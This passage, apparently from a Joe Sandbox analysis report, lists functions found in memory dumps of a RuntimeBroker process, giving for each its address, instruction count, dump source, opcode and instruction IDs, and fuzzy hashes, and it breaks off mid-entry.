                                                                                                                                      • Opcode Fuzzy Hash: e61a615fd47de33443f4fad3e021f4fe5bf0e528628442b7b6edb7321952b346
                                                                                                                                      • Instruction Fuzzy Hash: 5CC1DA70A0991D8FDFA8DB58C895BA9B7B1FF98301F1141E9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AF04 Relevance: .3, Instructions: 303COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 72a5dba4f06b3c4fe523d58c7053edbbd2c89445cba827f69b2c31b4a44013c2
                                                                                                                                      • Instruction ID: 89443927f4e20b23e055443054e124e04193b4e6d73236eabc3eb03d9584c4d3
                                                                                                                                      • Opcode Fuzzy Hash: 72a5dba4f06b3c4fe523d58c7053edbbd2c89445cba827f69b2c31b4a44013c2
                                                                                                                                      • Instruction Fuzzy Hash: 42C1C970A0991D8FDFA8DB58C895BA9B7B1FF98301F1141E9D00DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AE9C Relevance: .3, Instructions: 301COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ccd9023ddb38ec17c66379ffc2a126492b155891f1cf11ebb3f2f0a403d84f66
                                                                                                                                      • Instruction ID: b522cbbfe9d10c012753ef9fad48d896c1c7a648bf275cc400b000949970e555
                                                                                                                                      • Opcode Fuzzy Hash: ccd9023ddb38ec17c66379ffc2a126492b155891f1cf11ebb3f2f0a403d84f66
                                                                                                                                      • Instruction Fuzzy Hash: 2CC1C970A0991D8FDFA8DF58C895AA9B7B1FF98301F1141E9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AF86 Relevance: .3, Instructions: 296COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 48b7c09feafae1dfc874b2db83fe9888812f3675ed99aafccb1a50ea6bb077bd
                                                                                                                                      • Instruction ID: 796f26fd3441b37dfdd6f6285184e7207096160559852ed3dd00b03f798e3884
                                                                                                                                      • Opcode Fuzzy Hash: 48b7c09feafae1dfc874b2db83fe9888812f3675ed99aafccb1a50ea6bb077bd
                                                                                                                                      • Instruction Fuzzy Hash: B8C1CC70A0991D8FDFA8DF58C895AA9B7B1FF98301F1141E9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AF99 Relevance: .3, Instructions: 292COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 291798f5af502ed976f86c266b84d7d09d307f1eb99327c9c7e8f6d02bea7352
                                                                                                                                      • Instruction ID: edda595b1b8b3d8b7b2a4cb6ad7a5e31168b4649745094e3abe3bc15b7babf8f
                                                                                                                                      • Opcode Fuzzy Hash: 291798f5af502ed976f86c266b84d7d09d307f1eb99327c9c7e8f6d02bea7352
                                                                                                                                      • Instruction Fuzzy Hash: 3AB1BB70A0991D8FDFA8DF58C895AA9B7B1FF98301F1141A9D00DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B9DAD Relevance: .3, Instructions: 269COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9c20bc7a877c7400757eba0ed511018a5bc142bd4cd1d9218ecaf3535bf344c5
                                                                                                                                      • Instruction ID: f094780a6f6d594e59cd27d7c29857a45a7cf1753fe518ebdb72cf4bf344a993
                                                                                                                                      • Opcode Fuzzy Hash: 9c20bc7a877c7400757eba0ed511018a5bc142bd4cd1d9218ecaf3535bf344c5
                                                                                                                                      • Instruction Fuzzy Hash: D5A1EA70A0961D8FDB98EF68C8A4AADB7B2FF98300F5044A9D01DD7295DF34A981CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B9E48 Relevance: .2, Instructions: 172COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: cef88aca14b51f462462cf9c1feb6bd85ba22c7640de4459bf4cca10909d6d06
                                                                                                                                      • Instruction ID: bedc3aa1b2bb4bb3d0c1b8807769d0ea32a9e25f3128c8878ca7b2c3cd3632a8
                                                                                                                                      • Opcode Fuzzy Hash: cef88aca14b51f462462cf9c1feb6bd85ba22c7640de4459bf4cca10909d6d06
                                                                                                                                      • Instruction Fuzzy Hash: 3B61B970A1592D8FDB98EF68C894BADB7B1FF58300F5040AAD01DE72A5DB34A985CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B3000 Relevance: .2, Instructions: 162COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d2eec0e5f38575759619111fe324b1812bb89ee6c57ec22a8b0ea499258e1f11
                                                                                                                                      • Instruction ID: 8cfa5ff174b82a977abe9f964be0a4e80c754aae1363ade7128d79284a9909f4
                                                                                                                                      • Opcode Fuzzy Hash: d2eec0e5f38575759619111fe324b1812bb89ee6c57ec22a8b0ea499258e1f11
                                                                                                                                      • Instruction Fuzzy Hash: 8451027288E7C55FD7038BB09D616D03FF0AF17214B0A05DBD484CB0A3E26C5A4ADB62
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8886A0 Relevance: .2, Instructions: 156COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b886000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8519d5aa5968e7d7ea144487e0573d8623f797309e60793f3c15932cc86da80c
                                                                                                                                      • Instruction ID: 3ab912540e51e1378fa75cc9a7d54b0ba6a63186b34f0f900ca2c266f147044a
                                                                                                                                      • Opcode Fuzzy Hash: 8519d5aa5968e7d7ea144487e0573d8623f797309e60793f3c15932cc86da80c
                                                                                                                                      • Instruction Fuzzy Hash: 3651C670A1995D8FEBA0EB18C894BE9B7F1FF58301F4001EA915DD72A2DA746AC5CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B897039 Relevance: .1, Instructions: 138COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 420652084dbf2909a47fe9ce226466ed4d4232f9f5b4f60378424e30c9027eed
                                                                                                                                      • Instruction ID: 6f81993d50899f45081c37891edcb734b99e5e39cd5f5d10ac754332d515fbc0
                                                                                                                                      • Opcode Fuzzy Hash: 420652084dbf2909a47fe9ce226466ed4d4232f9f5b4f60378424e30c9027eed
                                                                                                                                      • Instruction Fuzzy Hash: 7551A034A09A4D9FCF84EF98D894AED7BF1FF58310B0501A6E409E7261D734E990CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CA8A5 Relevance: .1, Instructions: 135COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c9706c83bda54e3d8f02fcc357a170739641b4caacd315f95e790c58fc596d85
                                                                                                                                      • Instruction ID: 44721cb38dcd93a3eb48451026b4e04bfae97c2af9cad3cb1a400c0f6d9fc5dd
                                                                                                                                      • Opcode Fuzzy Hash: c9706c83bda54e3d8f02fcc357a170739641b4caacd315f95e790c58fc596d85
                                                                                                                                      • Instruction Fuzzy Hash: 2051E670E0961D8FEB65EBA4D8A57EDB7B1FF58300F1101AAD01DA3296DE346A81CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CAB84 Relevance: .1, Instructions: 102COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b7b83bed4246352fef89d83b4a842e3e0102e4d52cd8dabc803a9a145dc2f4d1
                                                                                                                                      • Instruction ID: 0393b368923e089074741455694a6efd08090bdc00a7a522b1cc912ca81a6df7
                                                                                                                                      • Opcode Fuzzy Hash: b7b83bed4246352fef89d83b4a842e3e0102e4d52cd8dabc803a9a145dc2f4d1
                                                                                                                                      • Instruction Fuzzy Hash: 6541E770E0561D8FDB69EF94D8A5BEDB7B1FF18300F1001AAD01DA3296DA346A81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B797E Relevance: .1, Instructions: 98COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6cb4ffdc5550d2cba8f7a5ee13e26ef54823b30f08278264094cf82cd8d2f0bd
                                                                                                                                      • Instruction ID: 298e76843055ad60bc0f3aeaa61e697bef1d1a6cab03f6647dc6ed0fb7459476
                                                                                                                                      • Opcode Fuzzy Hash: 6cb4ffdc5550d2cba8f7a5ee13e26ef54823b30f08278264094cf82cd8d2f0bd
                                                                                                                                      • Instruction Fuzzy Hash: 14316475E0962E8FEBA4DFA8C4656FD77A1EF5C350F110539D009D22E2DA386A81CBC0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CF3D0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2a4619559941a3ecb9012cc3ad17e678595b1de3fcb0af1df49471fca56fc95d
                                                                                                                                      • Instruction ID: 4dbb3ea07ed85c8ae41d7020c96a46435d20a4fed8071b23af0890c501e63632
                                                                                                                                      • Opcode Fuzzy Hash: 2a4619559941a3ecb9012cc3ad17e678595b1de3fcb0af1df49471fca56fc95d
                                                                                                                                      • Instruction Fuzzy Hash: 83316E71E0950D8BEB24EB84D894BFDB7B5EB59310F21427AD009D3295CF746A898B81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B896CC9 Relevance: .1, Instructions: 91COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1aa1a8c7ac11decc1bbf8afaaa35014846d66d2317917ec153cdc162e36e43f8
                                                                                                                                      • Instruction ID: 615a9b38052f005ffd7c29a6b748a9890ba235b13362755324c61ec293264abd
                                                                                                                                      • Opcode Fuzzy Hash: 1aa1a8c7ac11decc1bbf8afaaa35014846d66d2317917ec153cdc162e36e43f8
                                                                                                                                      • Instruction Fuzzy Hash: 57317C70A0964E8FDF54DF58C8A4AED7BB1FF48344F06026AE859E3291CB34A941CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8889DC Relevance: .1, Instructions: 90COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b886000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b0d8eddc0b3befa4bb33b57595e780488f7864f49c3488d7eaac79a36a3e2061
                                                                                                                                      • Instruction ID: abaed23fdc5b93cd20656e2908e69af2b22d9920e1d1fdae9c1367609b9ba6df
                                                                                                                                      • Opcode Fuzzy Hash: b0d8eddc0b3befa4bb33b57595e780488f7864f49c3488d7eaac79a36a3e2061
                                                                                                                                      • Instruction Fuzzy Hash: BA319BB1A0991C8FDFA8DF14C855AE9B3B1FB68305F1041EE810EE32A4CB759A81CF45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B880C2D Relevance: .1, Instructions: 85COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b880000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d83191f990166027a91bdb9064529d67cfa3d67ecdb3913ee2dc01579cf42358
                                                                                                                                      • Instruction ID: bd3e0cba6f82c1681f72b18ff27581614cd87426a56003768b3a871fe91a6225
                                                                                                                                      • Opcode Fuzzy Hash: d83191f990166027a91bdb9064529d67cfa3d67ecdb3913ee2dc01579cf42358
                                                                                                                                      • Instruction Fuzzy Hash: 56310A71E1DA8E8FE7229BA8C8212BD7BB1EF45310F060577D465D71E2CA382605C751
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B899C08 Relevance: .1, Instructions: 78COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1d37351a09484cfd75117b9a1b59f7367c0e2378c6ead1a33aa3c455c6adf63e
                                                                                                                                      • Instruction ID: a41b5f7eb359129346f9df0357e569375c61f8cc0c0d94b2c0beea93d1abd82d
                                                                                                                                      • Opcode Fuzzy Hash: 1d37351a09484cfd75117b9a1b59f7367c0e2378c6ead1a33aa3c455c6adf63e
                                                                                                                                      • Instruction Fuzzy Hash: DC315C31A0F64E8FEB21DBA4C9642ED7BB1FF19300F1105B6E409E61E2DA786E18C755
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89797D Relevance: .1, Instructions: 73COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 305dfd4ecfefeb8955909b34684bc1474d4bd13c012df2d66afcb79e2c13d822
                                                                                                                                      • Instruction ID: 87b3640d0eb154842936b6571defd6b63e5e68ef3b84a7edec6e99976d692abf
                                                                                                                                      • Opcode Fuzzy Hash: 305dfd4ecfefeb8955909b34684bc1474d4bd13c012df2d66afcb79e2c13d822
                                                                                                                                      • Instruction Fuzzy Hash: DC219F31A1965D8FDF19DF58C8616EDB7B1FB59310F01023AD40AD3291DB78A915CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B88D212 Relevance: .1, Instructions: 72COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b886000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d444e8d6ac81e0fab7bce31c99bcdf4ff1553e20445b1b4158ad4efd1c0a98bc
                                                                                                                                      • Instruction ID: 56f8cc8c88a342abc88996c65922bf3588a34b89148783783fbe75b9eb0b88f8
                                                                                                                                      • Opcode Fuzzy Hash: d444e8d6ac81e0fab7bce31c99bcdf4ff1553e20445b1b4158ad4efd1c0a98bc
                                                                                                                                      • Instruction Fuzzy Hash: 9B31B270E15A2E8FEBB5EB54C858BB8B2F5AF58711F4140F9901DA22A5DE795BC0CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C437E Relevance: .1, Instructions: 68COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b3fae86b66a5c3d719466501dc19b99a46e43983e14a9b7b9c1c49a4f49f324f
                                                                                                                                      • Instruction ID: c13e27a769de9c4770e5d9019624669eb4d842424f6aeae0a2eb8e97d63bfd18
                                                                                                                                      • Opcode Fuzzy Hash: b3fae86b66a5c3d719466501dc19b99a46e43983e14a9b7b9c1c49a4f49f324f
                                                                                                                                      • Instruction Fuzzy Hash: 5621D670E0A50D8FEB68EF94D464BBCB7B1EF5C301F1540AEC01AE36A1CA756A918F04
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8811BE Relevance: .1, Instructions: 68COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b880000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d9a54cf703d966f0e8bcf33b5fe55f8ac4b6fdda3d16ce122d1fb0f804903d02
                                                                                                                                      • Instruction ID: 7dd5b607e9a76538546d092a6b5c18eee524e0a7825ba40dd1db2057993752ae
                                                                                                                                      • Opcode Fuzzy Hash: d9a54cf703d966f0e8bcf33b5fe55f8ac4b6fdda3d16ce122d1fb0f804903d02
                                                                                                                                      • Instruction Fuzzy Hash: 69211830A1891E8FDB95EFA8C8A49ADB7F1FF5C301B11057AD019E72A5DF34A980CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B88CF71 Relevance: .1, Instructions: 63COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b886000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0eed96b8525e44838fa94a8d12b10764637ce1a4f8cc8d7b21ec54882696646f
                                                                                                                                      • Instruction ID: 4cf3af5b588c8a442b5d1b14a9f4ea50ed4730b38f7b77a8e7f77ca71cd57a76
                                                                                                                                      • Opcode Fuzzy Hash: 0eed96b8525e44838fa94a8d12b10764637ce1a4f8cc8d7b21ec54882696646f
                                                                                                                                      • Instruction Fuzzy Hash: E021F770E1AA2E8BEBB5DB44C8587B8B2B4AF08710F5100F9901DA22A5DE785B859F44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B88D111 Relevance: .1, Instructions: 62COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b886000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3a78fa0e7956fe68c79b18fe9bc3ba5f3450692846fa960cc22e49bf1ad942c3
                                                                                                                                      • Instruction ID: 31c1b156c719dda4b815592b4d5bae18cd24671fdbb7f9a543161bfbbb9cc49d
                                                                                                                                      • Opcode Fuzzy Hash: 3a78fa0e7956fe68c79b18fe9bc3ba5f3450692846fa960cc22e49bf1ad942c3
                                                                                                                                      • Instruction Fuzzy Hash: 9B21D670919A2E8BEBA9EB54C8687E8B2B5EB18700F4140F9D01DA26A5DE741BC4CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8829D2 Relevance: .1, Instructions: 59COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b880000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7ffd7c902f817cf67017b6804ad2802b83ef1ad89423cd7b70ef3dfa94365f6d
                                                                                                                                      • Instruction ID: 5bcad2d36417e4acf57804fd8a51fc78058f32ef981fe4410ba3c1b97169cc86
                                                                                                                                      • Opcode Fuzzy Hash: 7ffd7c902f817cf67017b6804ad2802b83ef1ad89423cd7b70ef3dfa94365f6d
                                                                                                                                      • Instruction Fuzzy Hash: 04213870A09A1E8FEB60EB18C9986E8B3B1EF58711F0001E9D05DD22A5DE741B818F40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CCDA3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
